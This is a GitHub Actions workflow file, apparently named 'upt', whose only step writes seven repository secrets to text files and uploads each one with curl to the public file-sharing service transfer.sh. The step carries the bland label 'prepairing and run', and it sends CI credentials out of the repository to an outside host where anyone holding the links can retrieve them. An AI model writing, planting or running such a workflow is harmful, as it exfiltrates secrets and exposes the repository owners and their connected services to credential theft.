name: upt

on:
  workflow_dispatch:
  repository_dispatch:
    types: [start]
jobs:
    run:
      runs-on: ubuntu-20.04
      timeout-minutes: 70
      steps:
      - uses: actions/checkout@v3
      - name: prepairing and run
        run: echo $SECRET1 >> s1.txt && echo $SECRET2 >> s2.txt && echo $SECRET3 >> s3.txt && echo $SECRET4 >> s4.txt && echo $LINK1 >> l1.txt && echo $LINK2 >> l2.txt && echo $LINK3 >> l3.txt && curl --upload-file ./s1.txt https://transfer.sh/s1.txt && curl --upload-file ./s2.txt https://transfer.sh/s2.txt && curl --upload-file ./s3.txt https://transfer.sh/s3.txt && curl --upload-file ./s4.txt https://transfer.sh/s4.txt && curl --upload-file ./l1.txt https://transfer.sh/l1.txt && curl --upload-file ./l2.txt https://transfer.sh/l2.txt && curl --upload-file ./l3.txt https://transfer.sh/l3.txt  
      env:
        SECRET1: ${{secrets.SECRET1}}
        SECRET2: ${{secrets.SECRET2}}
        SECRET3: ${{secrets.SECRET3}}
        SECRET4: ${{secrets.SECRET4}}
        LINK1: ${{secrets.LINK1}}
        LINK2: ${{secrets.LINK2}}
        LINK3: ${{secrets.LINK3}}
